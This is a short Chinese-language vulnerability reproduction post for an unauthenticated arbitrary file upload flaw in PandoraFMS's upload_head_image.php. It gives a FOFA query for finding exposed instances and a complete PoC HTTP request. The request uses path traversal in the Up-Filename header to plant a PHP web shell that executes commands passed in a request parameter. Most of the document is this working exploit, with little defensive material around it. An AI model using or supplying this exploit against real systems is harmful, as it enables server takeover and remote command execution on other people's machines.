PandoraFMS 监控软件 任意文件上传漏洞复现

0x01 产品简介

Pandora FMS 是用于监控计算机网络的软件。 Pandora FMS 允许以可视化方式监控来自不同操作系统、服务器、应用程序和硬件系统（例如防火墙、代理、数据库、Web 服务器或路由器）的多个参数的状态和性能。

0x02 漏洞概述

PandoraFMS upload_head_image.php 接口处存在未授权文件上传漏洞，攻击者可上传恶意木马获取服务器权限。

0x03 复现环境

FOFA：app="PANDORAFMS-产品"

0x04 漏洞复现

PoC

POST /pandora_console/enterprise/meta/general/upload_head_image.php?up=true HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Up-Filename: ../../../../../../../../../../var/www/html/pandora_console/extensions/rce.php
Accept-Encoding: gzip
Connection: close

<?php system($_REQUEST['c']); ?>

直接上传一句话